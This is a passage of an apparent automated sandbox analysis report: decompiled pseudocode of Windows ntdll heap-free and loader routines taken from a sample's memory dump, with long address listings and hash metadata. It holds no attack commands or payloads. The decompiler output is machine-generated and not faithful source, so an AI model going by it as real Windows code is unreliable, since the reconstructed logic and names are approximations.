													E017BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x18a6378 = 1;
														asm("int3");
														 *0x18a6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E017DA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E017DA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E017DBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0187A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0180D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E017BB150();
													} else {
														E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E017BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x18a6378 = 1;
														asm("int3");
														 *0x18a6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E017DA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E017DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E017DBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E017DBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                    0x017d99ca
                                                    0x017d99cc
                                                    0x017d99df
                                                    0x017d99e3
                                                    0x017d99f8
                                                    0x017d99fb
                                                    0x017d99fb
                                                    0x00000000
                                                    0x017d9a48
                                                    0x017d9a48
                                                    0x017d9a4c
                                                    0x017d9a51
                                                    0x017d9a55
                                                    0x017d9a61
                                                    0x017d9a66
                                                    0x017d9a68
                                                    0x01821457
                                                    0x0182145c
                                                    0x0182145c
                                                    0x017d9a68
                                                    0x017d9a6e
                                                    0x017d9a71
                                                    0x017d9a74
                                                    0x017d9a76
                                                    0x01821466
                                                    0x01821469
                                                    0x01821469
                                                    0x0182146c
                                                    0x0182146e
                                                    0x01821471
                                                    0x01821474
                                                    0x01821477
                                                    0x01821479
                                                    0x0182159c
                                                    0x0182159c
                                                    0x0182159d
                                                    0x018215a6
                                                    0x018215ab
                                                    0x018215ab
                                                    0x00000000
                                                    0x018215ab
                                                    0x0182147f
                                                    0x01821481
                                                    0x00000000
                                                    0x00000000
                                                    0x0182148a
                                                    0x0182148d
                                                    0x01821493
                                                    0x01821495
                                                    0x018214c0
                                                    0x018214c0
                                                    0x018214c3
                                                    0x018214c6
                                                    0x018214c8
                                                    0x018214cb
                                                    0x018214cf
                                                    0x018214f2
                                                    0x018214f2
                                                    0x018214f5
                                                    0x018214f8
                                                    0x01821501
                                                    0x01821508
                                                    0x0182150b
                                                    0x0182150e
                                                    0x01821510
                                                    0x01821513
                                                    0x01821515
                                                    0x01821515
                                                    0x01821518
                                                    0x01821518
                                                    0x01821513
                                                    0x01821521
                                                    0x01821525
                                                    0x0182152a
                                                    0x0182152d
                                                    0x01821530
                                                    0x01821532
                                                    0x01821539
                                                    0x0182153d
                                                    0x0182155d
                                                    0x01821562
                                                    0x0182153f
                                                    0x01821555
                                                    0x0182155a
                                                    0x01821570
                                                    0x01821577
                                                    0x0182157c
                                                    0x01821582
                                                    0x01821585
                                                    0x01821589
                                                    0x0182158b
                                                    0x01821592
                                                    0x01821593
                                                    0x01821593
                                                    0x01821589
                                                    0x01821530
                                                    0x00000000
                                                    0x018214f8
                                                    0x018214d5
                                                    0x018214da
                                                    0x018214dc
                                                    0x00000000
                                                    0x018214de
                                                    0x018214e8
                                                    0x00000000
                                                    0x018214e8
                                                    0x01821497
                                                    0x01821497
                                                    0x018214a4
                                                    0x018214a4
                                                    0x018214a7
                                                    0x018214a9
                                                    0x018214ab
                                                    0x018214ab
                                                    0x0182149c
                                                    0x0182149e
                                                    0x018214a0
                                                    0x018214b0
                                                    0x018214b0
                                                    0x00000000
                                                    0x018214a2
                                                    0x018214a2
                                                    0x00000000
                                                    0x018214a2
                                                    0x018214a0
                                                    0x018214b3
                                                    0x018214bb
                                                    0x00000000
                                                    0x018214bb
                                                    0x01821495
                                                    0x017d9a7c
                                                    0x017d9a7c
                                                    0x017d9a7f
                                                    0x017d9a7f
                                                    0x017d9a82
                                                    0x017d9a84
                                                    0x017d9a87
                                                    0x017d9a8a
                                                    0x017d9a8d
                                                    0x017d9a8f
                                                    0x0182166a
                                                    0x0182166a
                                                    0x0182166b
                                                    0x01821674
                                                    0x00000000
                                                    0x01821674
                                                    0x017d9a95
                                                    0x017d9a97
                                                    0x00000000
                                                    0x00000000
                                                    0x017d9aa0
                                                    0x017d9aa3
                                                    0x017d9aa9
                                                    0x017d9aab
                                                    0x017d9ad7
                                                    0x017d9ad7
                                                    0x017d9ada
                                                    0x017d9add
                                                    0x017d9adf
                                                    0x017d9ae2
                                                    0x017d9ae6
                                                    0x017d9b22
                                                    0x017d9b27
                                                    0x017d9b29
                                                    0x00000000
                                                    0x017d9b2b
                                                    0x018215be
                                                    0x00000000
                                                    0x018215be
                                                    0x017d9b29
                                                    0x017d9ae8
                                                    0x017d9ae8
                                                    0x017d9aeb
                                                    0x017d9aee
                                                    0x018215cb
                                                    0x018215d2
                                                    0x018215d5
                                                    0x018215d7
                                                    0x018215da
                                                    0x018215dc
                                                    0x018215dc
                                                    0x018215dc
                                                    0x018215da
                                                    0x018215e5
                                                    0x018215e9
                                                    0x018215ee
                                                    0x018215f1
                                                    0x018215f3
                                                    0x018215f9
                                                    0x01821600
                                                    0x01821604
                                                    0x01821624
                                                    0x01821629
                                                    0x01821606
                                                    0x0182161c
                                                    0x01821621
                                                    0x01821637
                                                    0x0182163e
                                                    0x01821643
                                                    0x01821649
                                                    0x0182164c
                                                    0x01821650
                                                    0x01821656
                                                    0x0182165d
                                                    0x0182165e
                                                    0x0182165e
                                                    0x01821650
                                                    0x018215f3
                                                    0x017d9af4
                                                    0x017d9af7
                                                    0x017d9afc
                                                    0x017d9b00
                                                    0x017d9b04
                                                    0x017d9b08
                                                    0x017d9b14
                                                    0x017d99fe
                                                    0x017d9a04
                                                    0x017d9a07
                                                    0x00000000
                                                    0x017d9a29
                                                    0x0182169c
                                                    0x018216a0
                                                    0x018216a5
                                                    0x018216a9
                                                    0x018216b5
                                                    0x018216ba
                                                    0x018216bc
                                                    0x018216be
                                                    0x018216c3
                                                    0x018216c3
                                                    0x018216bc
                                                    0x018216c8
                                                    0x018216cc
                                                    0x0182181b
                                                    0x0182181b
                                                    0x0182181e
                                                    0x0182181e
                                                    0x01821821
                                                    0x01821823
                                                    0x01821826
                                                    0x01821829
                                                    0x0182182c
                                                    0x0182182e
                                                    0x01821688
                                                    0x01821688
                                                    0x01821689
                                                    0x0182168b
                                                    0x0182168c
                                                    0x0182168d
                                                    0x0182168f
                                                    0x01821692
                                                    0x00000000
                                                    0x01821692
                                                    0x01821834
                                                    0x01821836
                                                    0x00000000
                                                    0x00000000
                                                    0x0182183f
                                                    0x01821842
                                                    0x01821848
                                                    0x0182184a
                                                    0x01821875
                                                    0x01821875
                                                    0x01821878
                                                    0x0182187b
                                                    0x0182187d
                                                    0x01821880
                                                    0x01821884
                                                    0x018218a7
                                                    0x018218a7
                                                    0x018218aa
                                                    0x018218ad
                                                    0x018218b6
                                                    0x018218bd
                                                    0x018218c0
                                                    0x018218c3
                                                    0x018218c5
                                                    0x018218c8
                                                    0x018218ca
                                                    0x018218ca
                                                    0x018218cd
                                                    0x018218cd
                                                    0x018218c8
                                                    0x018218d5
                                                    0x018218da
                                                    0x018218df
                                                    0x018218e2
                                                    0x018218e5
                                                    0x018218e7
                                                    0x018218ee
                                                    0x018218f2
                                                    0x01821912
                                                    0x01821917
                                                    0x018218f4
                                                    0x0182190a
                                                    0x0182190f
                                                    0x01821925
                                                    0x0182192c
                                                    0x01821931
                                                    0x0182193a
                                                    0x0182193e
                                                    0x01821940
                                                    0x01821947
                                                    0x01821948
                                                    0x01821948
                                                    0x0182193e
                                                    0x018218e5
                                                    0x0182194f
                                                    0x01821952
                                                    0x01821956
                                                    0x0182195d
                                                    0x01821961
                                                    0x0182196d
                                                    0x00000000
                                                    0x0182196d
                                                    0x0182188a
                                                    0x0182188f
                                                    0x01821891
                                                    0x00000000
                                                    0x00000000
                                                    0x0182189d
                                                    0x00000000
                                                    0x0182189d
                                                    0x0182184c
                                                    0x01821859
                                                    0x01821859
                                                    0x0182185c
                                                    0x00000000
                                                    0x00000000
                                                    0x01821851
                                                    0x01821853
                                                    0x01821855
                                                    0x01821865
                                                    0x01821865
                                                    0x01821866
                                                    0x01821868
                                                    0x01821870
                                                    0x00000000
                                                    0x01821870
                                                    0x01821857
                                                    0x01821857
                                                    0x0182185e
                                                    0x00000000
                                                    0x018216d2
                                                    0x018216d2
                                                    0x018216d5
                                                    0x018216d5
                                                    0x018216d8
                                                    0x018216da
                                                    0x018216dd
                                                    0x018216e0
                                                    0x018216e3
                                                    0x018216e5
                                                    0x01821808
                                                    0x01821808
                                                    0x01821809
                                                    0x01821812
                                                    0x01821817
                                                    0x01821817
                                                    0x00000000
                                                    0x01821817
                                                    0x018216eb
                                                    0x018216ed
                                                    0x00000000
                                                    0x00000000
                                                    0x018216f6
                                                    0x018216f9
                                                    0x018216ff
                                                    0x01821701
                                                    0x0182172c
                                                    0x0182172c
                                                    0x0182172f
                                                    0x01821732
                                                    0x01821734
                                                    0x01821737
                                                    0x0182173b
                                                    0x0182175e
                                                    0x0182175e
                                                    0x01821761
                                                    0x01821764
                                                    0x0182176d
                                                    0x01821774
                                                    0x01821777
                                                    0x0182177a
                                                    0x0182177c
                                                    0x0182177f
                                                    0x01821781
                                                    0x01821781
                                                    0x01821784
                                                    0x01821784
                                                    0x0182177f
                                                    0x0182178c
                                                    0x01821791
                                                    0x01821796
                                                    0x01821799
                                                    0x0182179c
                                                    0x0182179e
                                                    0x018217a5
                                                    0x018217a9
                                                    0x018217c9
                                                    0x018217ce
                                                    0x018217ab
                                                    0x018217c1
                                                    0x018217c6
                                                    0x018217dc
                                                    0x018217e3
                                                    0x018217e8
                                                    0x018217ee
                                                    0x018217f1
                                                    0x018217f5
                                                    0x018217f7
                                                    0x018217fe
                                                    0x018217ff
                                                    0x018217ff
                                                    0x018217f5
                                                    0x0182179c
                                                    0x00000000
                                                    0x01821764
                                                    0x01821741
                                                    0x01821746
                                                    0x01821748
                                                    0x00000000
                                                    0x00000000
                                                    0x01821754
                                                    0x00000000
                                                    0x01821754
                                                    0x01821703
                                                    0x01821710
                                                    0x01821710
                                                    0x01821713
                                                    0x00000000
                                                    0x00000000
                                                    0x01821708
                                                    0x0182170a
                                                    0x0182170c
                                                    0x0182171c
                                                    0x0182171c
                                                    0x0182171d
                                                    0x0182171f
                                                    0x01821727
                                                    0x00000000
                                                    0x01821727
                                                    0x0182170e
                                                    0x0182170e
                                                    0x01821715
                                                    0x00000000
                                                    0x01821715
                                                    0x018216cc
                                                    0x017d9a45
                                                    0x017d9a45
                                                    0x017d9a0e
                                                    0x017d9a1c
                                                    0x017d9a23
                                                    0x0182167e
                                                    0x0182167f
                                                    0x01821681
                                                    0x01821683
                                                    0x01821684
                                                    0x00000000
                                                    0x01821684
                                                    0x00000000
                                                    0x017d9aad
                                                    0x017d9aad
                                                    0x017d9ab0
                                                    0x017d9ab3
                                                    0x017d9ab3
                                                    0x017d9ab6
                                                    0x00000000
                                                    0x00000000
                                                    0x017d9ab8
                                                    0x017d9aba
                                                    0x017d9abc
                                                    0x017d9ac8
                                                    0x017d9ac8
                                                    0x00000000
                                                    0x017d9abe
                                                    0x017d9abe
                                                    0x017d9ac0
                                                    0x00000000
                                                    0x017d9ac0
                                                    0x017d9abc
                                                    0x017d9ad2
                                                    0x00000000
                                                    0x017d9ad2
                                                    0x017d9aab

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                    • API String ID: 0-3178619729
                                                    • Opcode ID: 1498eaccc89e2697c44c56e7c9bd9add67753d34de187754a38914208b7eb74c
                                                    • Instruction ID: 873ebf1e8df06f904d6fc2551cf50497a04bf7cf4bf185d9586fd790edbfdc5a
                                                    • Opcode Fuzzy Hash: 1498eaccc89e2697c44c56e7c9bd9add67753d34de187754a38914208b7eb74c
                                                    • Instruction Fuzzy Hash: 7922137060025A9FEB26CF2CC498B7AFBB5EF44704F288569E945CB346E771DA81CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E017C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E017C934A() != 0) {
								_t159 = E0183A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x18a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01835510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x18a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E017C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E017C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E017C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x18a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x18a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E017D2280(_t92, 0x18a86cc);
															_t94 = E01889DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x18a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E017C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x18a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x18a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E017FF380(_t136, 0x1791184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E017D2280(_t108, 0x18a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01889D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E017CFFB0(_t118, _t156, 0x18a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E017F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                    0x017c8799
                                                    0x017c879d
                                                    0x017c87a1
                                                    0x017c87a3
                                                    0x017c87a8
                                                    0x017c87c3
                                                    0x017c87c3
                                                    0x017c87c8
                                                    0x017c87d1
                                                    0x017c87d4
                                                    0x017c87d8
                                                    0x017c87e5
                                                    0x017c87ec
                                                    0x01819bfe
                                                    0x01819c00
                                                    0x01819c02
                                                    0x01819c08
                                                    0x01819c0d
                                                    0x01819c0f
                                                    0x01819c14
                                                    0x01819c2d
                                                    0x01819c32
                                                    0x01819c37
                                                    0x01819c3a
                                                    0x01819c3c
                                                    0x01819c42
                                                    0x01819c42
                                                    0x01819c3c
                                                    0x01819c02
                                                    0x017c87da
                                                    0x017c87df
                                                    0x017c87e3
                                                    0x00000000
                                                    0x00000000
                                                    0x017c87e3
                                                    0x017c87f2
                                                    0x00000000
                                                    0x017c87fb
                                                    0x017c87fd
                                                    0x017c87fe
                                                    0x017c880e
                                                    0x017c880f
                                                    0x017c8810
                                                    0x017c8814
                                                    0x017c881a
                                                    0x017c881c
                                                    0x017c881f
                                                    0x017c8821
                                                    0x017c8822
                                                    0x017c8824
                                                    0x017c8826
                                                    0x017c882c
                                                    0x017c882e
                                                    0x01819c48
                                                    0x01819c48
                                                    0x017c8834
                                                    0x017c8834
                                                    0x017c8837
                                                    0x00000000
                                                    0x00000000
                                                    0x017c8837
                                                    0x017c882e
                                                    0x017c883d
                                                    0x017c8840
                                                    0x017c8843
                                                    0x017c8846
                                                    0x017c8849
                                                    0x017c884c
                                                    0x017c884e
                                                    0x017c8850
                                                    0x017c8852
                                                    0x017c8854
                                                    0x017c8857
                                                    0x017c88b4
                                                    0x017c88b6
                                                    0x017c88b6
                                                    0x017c8859
                                                    0x017c8859
                                                    0x017c8859
                                                    0x017c8861
                                                    0x017c8866
                                                    0x017c886a
                                                    0x017c893d
                                                    0x017c8941
                                                    0x00000000
                                                    0x017c8947
                                                    0x017c8947
                                                    0x017c894a
                                                    0x017c894c
                                                    0x00000000
                                                    0x017c8952
                                                    0x017c8955
                                                    0x017c895a
                                                    0x017c895d
                                                    0x017c895d
                                                    0x017c895f
                                                    0x017c8961
                                                    0x017c8961
                                                    0x017c8968
                                                    0x00000000
                                                    0x00000000
                                                    0x017c896a
                                                    0x017c896b
                                                    0x017c896e
                                                    0x00000000
                                                    0x017c8970
                                                    0x017c8970
                                                    0x017c8970
                                                    0x017c8970
                                                    0x017c8972
                                                    0x017c8972
                                                    0x017c8974
                                                    0x00000000
                                                    0x017c897a
                                                    0x017c897a
                                                    0x017c897d
                                                    0x00000000
                                                    0x017c8983
                                                    0x01819c65
                                                    0x01819c6d
                                                    0x01819c72
                                                    0x01819c75
                                                    0x01819c75
                                                    0x01819c82
                                                    0x01819c86
                                                    0x01819c87
                                                    0x01819c88
                                                    0x01819c89
                                                    0x01819c8c
                                                    0x01819c90
                                                    0x01819c95
                                                    0x01819c97
                                                    0x01819ca0
                                                    0x01819ca3
                                                    0x01819ca9
                                                    0x01819ca9
                                                    0x00000000
                                                    0x01819ca9
                                                    0x01819ca3
                                                    0x00000000
                                                    0x01819c97
                                                    0x017c897d
                                                    0x00000000
                                                    0x017c8974
                                                    0x017c8988
                                                    0x017c8992
                                                    0x017c8996
                                                    0x00000000
                                                    0x017c8996
                                                    0x017c894c
                                                    0x00000000
                                                    0x017c8870
                                                    0x017c887b
                                                    0x017c887d
                                                    0x017c887f
                                                    0x017c8881
                                                    0x017c8884
                                                    0x017c8884
                                                    0x017c8886
                                                    0x017c8889
                                                    0x017c888c
                                                    0x017c888e
                                                    0x017c8891
                                                    0x017c8891
                                                    0x017c8898
                                                    0x00000000
                                                    0x00000000
                                                    0x017c889a
                                                    0x017c889b
                                                    0x017c889e
                                                    0x00000000
                                                    0x00000000
                                                    0x017c88a0
                                                    0x017c88a8
                                                    0x017c88b0
                                                    0x017c88b2
                                                    0x017c88d3
                                                    0x017c88d5
                                                    0x00000000
                                                    0x017c88d7
                                                    0x017c88db
                                                    0x017c88dc
                                                    0x017c88e0
                                                    0x017c88e8
                                                    0x017c88ee
                                                    0x017c88f0
                                                    0x017c88f3
                                                    0x017c88fc
                                                    0x017c8901
                                                    0x017c8906
                                                    0x017c890c
                                                    0x017c890c
                                                    0x017c890f
                                                    0x017c8916
                                                    0x017c8917
                                                    0x017c8918
                                                    0x017c8919
                                                    0x017c891a
                                                    0x017c891f
                                                    0x017c8921
                                                    0x01819c52
                                                    0x01819c55
                                                    0x01819c5b
                                                    0x01819cac
                                                    0x01819cc0
                                                    0x01819cc0
                                                    0x01819c55
                                                    0x017c8927
                                                    0x017c8927
                                                    0x017c892f
                                                    0x017c8933
                                                    0x00000000
                                                    0x017c88f5
                                                    0x017c88f5
                                                    0x00000000
                                                    0x017c88f7
                                                    0x017c88f7
                                                    0x017c88fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017c88fa
                                                    0x017c88f5
                                                    0x017c88f3
                                                    0x00000000
                                                    0x017c88d5
                                                    0x00000000
                                                    0x017c88b2
                                                    0x017c88c9
                                                    0x00000000
                                                    0x017c88c9
                                                    0x017c887f
                                                    0x017c886a
                                                    0x017c8857
                                                    0x017c8852
                                                    0x017c88bf
                                                    0x017c88bf
                                                    0x017c87aa
                                                    0x017c87ad
